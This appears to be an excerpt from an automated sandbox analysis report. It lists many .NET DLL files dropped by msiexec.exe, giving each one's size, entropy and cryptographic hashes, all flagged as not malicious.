                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21232
                      Entropy (8bit):6.926543977764199
                      Encrypted:false
                      SSDEEP:
                      MD5:9E71DFCE86F14BEEB8F3E9F00D0A472E
                      SHA1:BF83A7E98418BDE907DEAE8C0C0F3FB0F6C9DB1A
                      SHA-256:62DCE4679E33C079E11F41B096BC803B30B1D963A1EA79EFA84187CEBBC06AFE
                      SHA-512:FF8CDC0287E510F859F46C1E35F9B0FB42EAD907B1EAA42C90C84B31CF6C2D4638CF682777F359B8611DD22062C1A5FA71F7FB667B7A3903783673E678098515
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21200
                      Entropy (8bit):6.904224159979604
                      Encrypted:false
                      SSDEEP:
                      MD5:05D1B950C470EA8B0AA357F9A59CF264
                      SHA1:B1756DC750ED5CFD5D0BFC70CB899FD590867A0C
                      SHA-256:DAAABD07F1B94BE19D72913360286E469F454886850AFCC603506EAAB03150E4
                      SHA-512:8E65FF1909AC8D65F599062E61AC935A919D43404C357DBC6AD628923B0C7ED7158862DDD272CFC1C2A8CEC393D48A57BC4D69CE7706EEF1BB6838826B1AFAE3
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):18024
                      Entropy (8bit):6.343772893394079
                      Encrypted:false
                      SSDEEP:
                      MD5:C610E828B54001574D86DD2ED730E392
                      SHA1:180A7BAAFBC820A838BBACA434032D9D33CCEEBE
                      SHA-256:37768488E8EF45729BC7D9A2677633C6450042975BB96516E186DA6CB9CD0DCF
                      SHA-512:441610D2B9F841D25494D7C82222D07E1D443B0DA07F0CF735C25EC82F6CCE99A3F3236872AEC38CC4DF779E615D22469666066CCEFED7FE75982EEFADA46396
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21784
                      Entropy (8bit):6.872325269765102
                      Encrypted:false
                      SSDEEP:
                      MD5:9F31B6954FD453F13B5F39DA36F2E8EB
                      SHA1:7A6276348D85EAF00AE6958117797045929078CB
                      SHA-256:18A610B8BAD43CF784CDE4D4902A238F2281C2A677DAAE790CAB55F6DA915979
                      SHA-512:D3696D4D60CFC5AA5834F60A0B97A4F3A3F8EC3FB05BEB3C3D927426B72B3E5463C628C7DF950E43FF1344823B8C2D39730BA47BA0F2FEC7A0CFCDC237A5BCC6
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21720
                      Entropy (8bit):6.851248273705748
                      Encrypted:false
                      SSDEEP:
                      MD5:B0346A4C5FA0FAC135509A0E7D3C4449
                      SHA1:7D71B46BB9A28289384AA1EDF5CB03D64B3BCFF0
                      SHA-256:F9FEB277F86241F55425182A26DECF50A210675D4F040EC542AF3FB3DD287DE6
                      SHA-512:916A465236F11FF6E421800961B20CB80A320176DA8C58002F6742040CE33C5207D378667A584C5D8E35CF8CFC19AC54504B3F6129E489EEABD86A5B4E7D8C77
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21200
                      Entropy (8bit):6.924980445039345
                      Encrypted:false
                      SSDEEP:
                      MD5:65FBBA7A86B3E175200AE44727AB40E5
                      SHA1:584B8683943A8E0AE98B10F452C94F6109D1C4EA
                      SHA-256:7A81D2A001B543B2A55C9AFFC845A5DF7EDAB1FD308C6979BBD982B1B826B57C
                      SHA-512:43607AEBBB0A3F2D437C7DE77785CD6C9F49411E1D4EFE41ECCD93D7FCCA197DABD4E15F45FBC4FBFF27C202FEC96B79F82202AFC88B59C20ED5E7912BCDC6D3
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):28624
                      Entropy (8bit):6.700175270481286
                      Encrypted:false
                      SSDEEP:
                      MD5:568B53398BFC0E54AAF448B68F5C77C2
                      SHA1:76B0B6E65E38A90A4ECDB3F6DFE16D5A803081E9
                      SHA-256:8BB9D52BA5C67F05C8F632DEB1E7E98A909318B10E1388B47E919515FDD42CBF
                      SHA-512:6052EE3664FD2095DE3338CF6D24DF022DC13D00B4BF14C57572F2A34AC078E07BD1F634A50028DB0952AE8067FFCF19079177FA534240D9526F33AE1E1459AC
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):24296
                      Entropy (8bit):6.780229572480669
                      Encrypted:false
                      SSDEEP:
                      MD5:D7E74EA95786A02687CE43C356ABDC95
                      SHA1:2E6A3047BD3BCEE01F55D139A3C03E6D4D2DB14A
                      SHA-256:383A1F9DAC655C6805C24D4A03BC5FBEB9ABD1536DE5510F5756259EEFCB4871
                      SHA-512:B7E76B65406904F092FE96DED558A94EA53FA40BEC500EFCDCDEBF124921F4526DE2F239CD25BAE1801692DD6DFE5652FFD46B2AA4325133C7127D27F626BB9B
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21200
                      Entropy (8bit):6.898006718463938
                      Encrypted:false
                      SSDEEP:
                      MD5:6CCCA0BA6A7B9CAF8B8D3B0287DBED8B
                      SHA1:B81FF87B407578EFBF184BDC10D0F101610379DB
                      SHA-256:16E7EFD6C19B2E3E516AE1BC7B3175D0E22F1AD357701F229E353DA348EEE182
                      SHA-512:8505479031A0A5CAEEEE1A8A60AA35D7E0C332BBFDDE61193B615E242C127780E55F404289F26930E9EC9E53FCCF436B1A991BA2C8A9177163B41AAAF6BE0D32
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21264
                      Entropy (8bit):6.950539566613158
                      Encrypted:false
                      SSDEEP:
                      MD5:A42C32F4E98A9656FC2FED72D30E9380
                      SHA1:B6B8986FC1B5140817DE262AE4102499E37DAFFD
                      SHA-256:C343F7BF08A4C97A90BA607A492C721533333173FA63F65F6E5DE9CEEE65FC16
                      SHA-512:5C2DE8F18CB9B367D7DE88A2AF8A7FD538486B9FFB393972FBDFF42CD2899D6679FD8D7076FE37954D5E8EAB6C5041F19EDAD32659C5CCEEC1C2BA35E6F8982A
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21240
                      Entropy (8bit):6.93694523950017
                      Encrypted:false
                      SSDEEP:
                      MD5:E1E2239979B853157BA75310FEA7E65D
                      SHA1:EE1AE416570911282ABDD3745674E58F9D469C9E
                      SHA-256:E8D531F0AAA674F794B7F43EC76E4E32AD93F3C136020CF4B6E3433832F9C0DF
                      SHA-512:DDF9D6E05D9566C9E02295A061756FF164C408EA211D016023EDBFA91BBA4D0D7DFF293D2BF4D87C25FE923500C7535E4A21B6A8D4B18FD9505F8E5C635F9C95
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):27048
                      Entropy (8bit):6.661112158879877
                      Encrypted:false
                      SSDEEP:
                      MD5:3373A24450373CAF0CBB756E10097FD4
                      SHA1:87C352153804FF5BD4F8AEF8851546F3CF22461E
                      SHA-256:575E26A455892F1FD77B730E6928F70B760E76094AFE5BCB677D854DAF869AC5
                      SHA-512:85E005B5BEB7C14BA34C62C38DA635962D1AA4740F91549B8659910EDD10F0FDE1734064B19567BF5BC63DBBBB62399F6CBE0AA323193DA599232DCE22B14A01
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):24816
                      Entropy (8bit):6.774158289322937
                      Encrypted:false
                      SSDEEP:
                      MD5:9087373EEE85190DAF8915E614B1E4BD
                      SHA1:F434AF8CE30EAF5511E28C0230211F0D8ED4A154
                      SHA-256:557858E44A51A74646AD07A85CBA56AF1DA13AD26AC2F74EE5D8C3E8A171C221
                      SHA-512:F728238FA567457D7977FEA667FCCB56C2EFE718A9A362E294934CC752E506E05C5D20C0BE2A309DE2A984DD60C3AE4EA03054185B96C9B5F5F5DE827AF9CEAF
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):29360
                      Entropy (8bit):6.504362287456874
                      Encrypted:false
                      SSDEEP:
                      MD5:0E35085C130D2D91E5241334BE7EF0DA
                      SHA1:FD622ADE5CAE26353A22B6FA50A83669B72B6C41
                      SHA-256:50AD612D4CF6113DE26B2870DA099C4817F59E64A2DA98F05803B4A2E2304919
                      SHA-512:2498811F4AAC308CDC55C3406BEA4FEF5DC9E6F23559B09FB181F7447474EF586F00038282DDC39C241490B5DC2BCA7F41F19BD3E1BB00890DA29DF6489BB151
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21200
                      Entropy (8bit):6.921540746927502
                      Encrypted:false
                      SSDEEP:
                      MD5:99604779C668D9B8EF913854B9A24F9D
                      SHA1:97B62A3DBE2465B4C995E082AD6FF183F6267F59
                      SHA-256:8270D1248950EE8AEE5C2AC2E321DF07E65C7A94004AE03C857DEACD231A5542
                      SHA-512:BE6DEE6E7030B400EAC68AC289EC9B74BFE0140EE59AF5E68BF43A63A821C6F6AD9CA03C501896A6C92464BF8116D7996FFE640AB51BD9FA96673D9794AC82CD
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):47016
                      Entropy (8bit):6.126380612996906
                      Encrypted:false
                      SSDEEP:
                      MD5:E4A1681E09AEC6EFB00FB2A9355A1296
                      SHA1:95699D187BF150D319CC64F90064301CAC57F338
                      SHA-256:967DDDBFE7F1CEB933B5875D65C59CDB835BB063F287A361E8B35DD814A9B14D
                      SHA-512:49299C773A4C7CCC235C54A91FD07A000CF547B3EE55272E2EE8B2AA40281DC0AF3C3B5A9EDF5CAEE4BEB3AD0DE5A0DEA07159ACEBA582911B78A6B85DB793B0
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21240
                      Entropy (8bit):6.935501042478791
                      Encrypted:false
                      SSDEEP:
                      MD5:F554762FC38F81CB22D1DC8AB5CD40D5
                      SHA1:A67FDACEB10E828805A9E24FE0C59E1D73D19A7C
                      SHA-256:566775F5502C3C1FA70ACADE145293DF5D02C1A9F031820D429605E9B4584B44
                      SHA-512:BD23571BF9D0FE62BBF5FDDCAFF6B8F383CCC728AFBCEEBCAD8404D68C02EA1F55D4A22306BFC86C30172E70C6CF5425F2FF8877AAA8758A51C48CF4303BD2AB
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21256
                      Entropy (8bit):6.945812678642078
                      Encrypted:false
                      SSDEEP:
                      MD5:7AB10B31C5CE290672B319D403751E95
                      SHA1:ED23E654968B3704A82F613B06BE5829E0CAAD70
                      SHA-256:1F5C1ABE1B2720680170388569354D8CDA9D558B53AFF7CAF175CE0F7E3733E5
                      SHA-512:65ED3AFF2424E7560FCC44380DC719BF200D444F9B06AF7F916D52152C330D55A7F4B96D0C1D2B291B07D82805C71DD9850F2F5F612F00ADFCA1CDF117C6B14A
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21784
                      Entropy (8bit):6.863777213641518
                      Encrypted:false
                      SSDEEP:
                      MD5:A60084F9988C7907F7092C143C8D3818
                      SHA1:A69238054BEE26063D32B85B797BC4E0C49F79D4
                      SHA-256:B755D0B55A465D07C9DD3FC11822487D1E649B684AEF91A4CE9B935B416A01B9
                      SHA-512:6147F18BD9C49727251CBEA7A3168E3B19F34056DE5A9898571ECDEC85D424627A72968072449C81F97F95330BAED7E2ED0F6FDBA7E2F79B59B9352AB11003CF
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):22832
                      Entropy (8bit):6.823696761227228
                      Encrypted:false
                      SSDEEP:
                      MD5:06D000552ED6785988AE188FC35D1B86
                      SHA1:B0A8868D459FE0AF34D16C263CFE0202C414DC53
                      SHA-256:3C8630ACB43C12A6A317227FF2922056ECD991FE945464FDF7EA81F1293A479F
                      SHA-512:F3E5E97AAF3D26EA62C64787198CCE6DF703EA3A4EBB389BEBC84B424C8129A0181142A4FA5D965CA3106758A047D0E1A723F181AD293FD389C4F1B8D290B5A5
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21208
                      Entropy (8bit):6.913262967781329
                      Encrypted:false
                      SSDEEP:
                      MD5:6DCD91B6A029794728F4EDEB2BF2E42D
                      SHA1:82BA1313448B431893C14D866F46D47B620514A9
                      SHA-256:02416BC542BE82002B8B81ADBBBCDCC8D098104020D09B571DC674B5BC19A177
                      SHA-512:2566F369EDEE9313E823AA2667CB95977F0DB57B4B47DA62F44850811F524D0598FDE6F5BB082BB3325789E4B256E970603B4297D3586F1C435498430723A38B
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):22392
                      Entropy (8bit):6.85070945929809
                      Encrypted:false
                      SSDEEP:
                      MD5:4523F60270149BAD67F6AE63375D2CDB
                      SHA1:FF6E6BCD83A11D40BF53DABD0480A67AECFDCF50
                      SHA-256:18032D190D0D599823E59C8DD8B588909BEF8888B8BF304723A138B61F1B911F
                      SHA-512:025E33F6927E634FE187491F40D96B36B2DDAF2ACDE97B340C8705BAE58BDED6C02B8BF9199A1B9D4AC75884C69DC665DC03B34571B1BD178CA1784C5F0D5451
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21232
                      Entropy (8bit):6.925439366434707
                      Encrypted:false
                      SSDEEP:
                      MD5:D40515A84448B91315F956E6D1A6C64B
                      SHA1:7FE773332D0461A252E52BE720A7794FCAAC7BFB
                      SHA-256:CBE29672CD2B6A0EA97B55F3844FBEDE3E591996F39C3AA1F829F2FA50551FA9
                      SHA-512:322F82AEB9EB9DA22257AC9FE835BF1C54C1BB268D37F0F97A4CA52BB42F6ACCCA9C8DBDB96D6D695FA69C24F5069978A4B6F1E960EE81D9EA671CCD30A348D3
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21696
                      Entropy (8bit):6.85763123423511
                      Encrypted:false
                      SSDEEP:
                      MD5:7F65CCBF58C39F3853BB8DC4137DFD12
                      SHA1:3946DFF0B68F0CA01689BD44C348559ADF548258
                      SHA-256:0AB1F7F87B7C2AFCA57D394E4F4E262C82BA3209CB0A750CD66401FB33F21ECA
                      SHA-512:FF7D953EC4B82C10E64FC85D3AFC8A1A58582170EF1752D4688FA1D48EFC490DBA5F0A784E748F7902E96FD885EA868B1A84DE44F48CF071975F3CD3F8E52C6A
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):78976
                      Entropy (8bit):6.105061710610473
                      Encrypted:false
                      SSDEEP:
                      MD5:C77AE3414D78C1F082C65415FAE69661
                      SHA1:3B35461D86A774535AC226CA9706FB50332DE20A
                      SHA-256:C792BFE3F43C894E20339252D159A96A20CCC6E13322B2D382570FF97939E501
                      SHA-512:08941BA8BE5031CC4E363A916525437C62B409576C91C10FC72795FAA10BC989F0D1797B576802E208DFE4305A4447C0299E2755BA92F97F531DE1F56FD5865A
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):582832
                      Entropy (8bit):5.9893996630338
                      Encrypted:false
                      SSDEEP:
                      MD5:170172ABD66B9D41ED8117674E112709
                      SHA1:EA762C545A047C39E488D7E66FFCE4FDBD633BE4
                      SHA-256:090A9E3B9591C05BD1DF36992FDD8D4EABD4FC2A6F2D08490CA0D410AFF52E5A
                      SHA-512:28E78154048F711E536A5C10660C86806EE4156FBB964F6A0211DD1F6A5BF52D447B8D32F51F5CA5E31FF0044ECCE4148E46EF5B173940458033BADBBBFB5C30
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21232
                      Entropy (8bit):6.952743264834991
                      Encrypted:false
                      SSDEEP:
                      MD5:7D317D88F9860A18ECF7FB90B33995D3
                      SHA1:C2E4B19CB9A0B48E899512CD121FFE6657D41072
                      SHA-256:C98A52BD017DF01AEA7B955E6F219537D391A62C2C2B976684DA282F9CD7CACF
                      SHA-512:79ED01C6D1CEA3DBA6B3566E03D05A971745E221BE9330F6800A249D1B239E092D3FF704E7403E7ECD6B7709B24B0CDD7E518F2EE5DA38019E7139D80594173E
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):37752
                      Entropy (8bit):6.646566139863202
                      Encrypted:false
                      SSDEEP:
                      MD5:1A890C488CF2ECD406B804E7E3C5B7F0
                      SHA1:BF2C1287F0EC04223CD17FE20AB2ECFFF18579E3
                      SHA-256:F17FF442B77A6CFE9C118D2F8FAE1AB6C814A0D4F35C5844996BE84F3FCC8592
                      SHA-512:4EEC61F9245DFF3D468818D6D6CBB8E12A5172658F1027A9AB0ECE03CC1377499833056A0DD4FF20B83B9FF9E47BB2E7F8DC7B641BC63AD78FF96C54BE01F524
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):25984
                      Entropy (8bit):6.291520154015514
                      Encrypted:false
                      SSDEEP:
                      MD5:E1E9D7D46E5CD9525C5927DC98D9ECC7
                      SHA1:2242627282F9E07E37B274EA36FAC2D3CD9C9110
                      SHA-256:4F81FFD0DC7204DB75AFC35EA4291769B07C440592F28894260EEA76626A23C6
                      SHA-512:DA7AB8C0100E7D074F0E680B28D241940733860DFBDC5B8C78428B76E807F27E44D1C5EC95EE80C0B5098E8C5D5DA4D48BCE86800164F9734A05035220C3FF11
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21232
                      Entropy (8bit):6.924199325151996
                      Encrypted:false
                      SSDEEP:
                      MD5:9088029E38B2A393F22AFD9E576CE86E
                      SHA1:05E65EE95F647F38C717C73A0399870912DD374A
                      SHA-256:3468E0C875DB94A8F45D56AB76BBCC677B942CA51A23649BA3C5AD1B20E391F1
                      SHA-512:23DCF5819996EE0F0C8FE044D6642A12E98A40309CE1F3F74688CF8E3DD6F6ED230AEC391FE7E511E15FBBBF14BFF09F976E923F22F2D68AD816D8FFAD17F101
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):22224
                      Entropy (8bit):6.854915516686979
                      Encrypted:false
                      SSDEEP:
                      MD5:0AD301EE2B7282B87DCD0D862EFE14DC
                      SHA1:F720109A38846E358BDE7C47D9C946A79D2B6B1C
                      SHA-256:0110616DFE870B8BCF25DF8F6CE38EF5AAC39E728DDAA3420EA199F5A7E80A16
                      SHA-512:C66FC92435C399804D8A8C1C836E5648725DDA8A55D7ACD897AE719CA231D89251A0D9A293A67F079E345709CFDA83DCC693AD41A28D13661A55459F94FE33E0
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21200
                      Entropy (8bit):6.917303618941186
                      Encrypted:false
                      SSDEEP:
                      MD5:FDB3A743B2DAE5924CBA88A5C865128D
                      SHA1:C53132EC95A7211C1BB6DCD5AD21CCB150A7B923
                      SHA-256:9D4FAEA9892D4ECFABF61986687FC6CB30F5F51A6B62819B9571FF58E04C4DD5
                      SHA-512:CBD8370F3CB84CB9EB8BF3A7392245D6A90CE1A324971EA96170974DA092BDFC3DB2196F66958CA5D5000F13B18AFAB44FF82D50C5B9A625AA1B7A4AF17717DE
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21216
                      Entropy (8bit):6.913880291057063
                      Encrypted:false
                      SSDEEP:
                      MD5:18CE4ECC42FC8D999EF091D812472CF0
                      SHA1:F874903CEA9F08F1A0887949B47722E6BA81B789
                      SHA-256:3D9EBC81B1BD3234666C8CE403A5F17A726867C68FFA5DE4EC8EE92599335658
                      SHA-512:0C027440EF6F6C105B0BF9319F4E0EA421FD310699028AF0A159300145C662E74B4B5D969663E3B52CDA7F9934A6AB93BBAE9BCD1BD39AAAC24FCBA7EC451156
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21200
                      Entropy (8bit):6.897588144752097
                      Encrypted:false
                      SSDEEP:
                      MD5:824053272B268C577E9ADF17ED398142
                      SHA1:5EA3F290ECDE1BAB983CEEE2417A688B7ED9B7F5
                      SHA-256:04B9235F64C9C846F8A767230714895DA87C7AE2CD0105E9D14835AE46F0FED8
                      SHA-512:F475DCD2CC23FDFB017688713170FCAF8FEA05869A680613EA4AD84CB358ED0F2442DB0FF0DCBD739E3CC3DB7128A8F4A568AE8E5AF6A8840319B02630E420B9
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):22192
                      Entropy (8bit):6.821272653310105
                      Encrypted:false
                      SSDEEP:
                      MD5:11D674CFC81B7102C0BC6FFE58F6AC5E
                      SHA1:DDDA49572D112944EC9AB62B31959AA93A386618
                      SHA-256:4DC8D588EC63641C28422D648E8DE5E2C030EB7AFEC2071A99DD3BD9A204557F
                      SHA-512:FB7C628B796A321AD9ECBF01D165E24F151C99D7E60A65D0AF52F779AD60A3203F47B247D44FC47044A68790D1EA4EE458A7BC8DF7EBE9D42C2275A9C11BC324
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):78992
                      Entropy (8bit):6.056589052139225
                      Encrypted:false
                      SSDEEP:
                      MD5:8C9424E37A28DB7D70E7D52F0DF33CF8
                      SHA1:81CD1ACB53D493C54C8D56F379D790A901A355AC
                      SHA-256:E4774AEAD2793F440E0CED6C097048423D118E0B6ED238C6FE5B456ACB07817F
                      SHA-512:CB6364C136F9D07191CF89EA2D3B89E08DB0CD5911BF835C32AE81E4D51E0789DDC92D47E80B7FF7E24985890ED29A00B0A391834B43CF11DB303CD980D834F4
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21712
                      Entropy (8bit):6.911176710124494
                      Encrypted:false
                      SSDEEP:
                      MD5:090FF56C4FE2EEFF2E16F03099AD71E1
                      SHA1:EF317CACC230A58A3B2FCC6CC079CC763AFCC7C5
                      SHA-256:5F560E1DD529BB2529D7052E04008449F58D0439C2BB43437D7B5D39F84F949F
                      SHA-512:FDAC43D0A18D9158DB4438349A7A550557A36E6ED0665EFCB65A046A5BEB5C38181996CBF6D860B8AD01C19E35315BB61AE766CAF06B23985E046484DAB45256
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21696
                      Entropy (8bit):6.875690583921479
                      Encrypted:false
                      SSDEEP:
                      MD5:37E21B63959F243A157534133F85C5AF
                      SHA1:DFAD52A9990B2FAFCE7098CEBB174927E8E0BA00
                      SHA-256:4F6A14E4BA2A2B26B8B8433D5F82F75A96AF5A4F036D9447373B07271493917B
                      SHA-512:F59FAA6319FE2AFEBCCBD643E20C1EDB75DB74E9271354BD86DAC3BEA2CC59452EE024DC26B517AE88254A7C90DBE0E6C19A7B5AB3BFE9159D986D6C53CA5521
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):22904
                      Entropy (8bit):6.8552351968066105
                      Encrypted:false
                      SSDEEP:
                      MD5:A5F541655A9EDC24F4B5184A40E40227
                      SHA1:90E196DCD76168F770ABE30098399BC5866ADF1B
                      SHA-256:B33D08149A756A401628D11BFDDFEEACA1F03C0578395BB061DAE44F8A12CE5D
                      SHA-512:C4D13E95114E232300B36ED7B7A72CE786F66D0F68B0ED9D54FEF788A831B39C893DAA3C2DE982B376A56A539C23E8F314CE8552ED7094E6826D5F70BFBE2D4B
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21176
                      Entropy (8bit):6.950543834803339
                      Encrypted:false
                      SSDEEP:
                      MD5:415E3AB72F17F10D646B3E2C7A76F612
                      SHA1:ED25E94D4E88293345A0F28A5B975159C393B050
                      SHA-256:24DAA1FAEE0478BA58FEBE8EE789EB88BE0A14D350B57AD8B10690C55976B2E1
                      SHA-512:55B5C22B87F21DF89D0514AE05C9433B65A3C7532845FDFC4C2C5C5E2C3929D70143D84698FDB4DC13EC01895B1022CF0E5E76E12102739530B54150932A7B07
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21712
                      Entropy (8bit):6.8884260737638385
                      Encrypted:false
                      SSDEEP:
                      MD5:328D12AF9613B0F3F25320B85DCCCBF4
                      SHA1:09D02B85A094E925AC3C5D8B1ACA096B730C160F
                      SHA-256:8957F0BCEA6AB8A011A53AE62466505199F11A228F87F3809931D974F87078CE
                      SHA-512:16569ECB727ADA36811E72FFC925F07AA21B8A627BE45F1EDA18CF2B759939591DCAFCB2D087596EE903C5ABFFAF19F56F25E9710EF22874C934CAD19537B798
                      Malicious:false
                      Reputation:low
                      Process:C:\Windows\System32\msiexec.exe
                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):21712
                      Entropy (8bit):6.916807633540711
                      Encrypted:false
                      SSDEEP:
                      MD5:D9F02D9F7DA653F82E75112A2AB99CE6
                      SHA1:BBBB4C2C3911AE1F5BA7FAF1D632ED0F14D9B6AC
                      SHA-256:21493F7F615A099E795F7FAE7ECCE6082414D1D427790BDF4B103623A3AB34EB
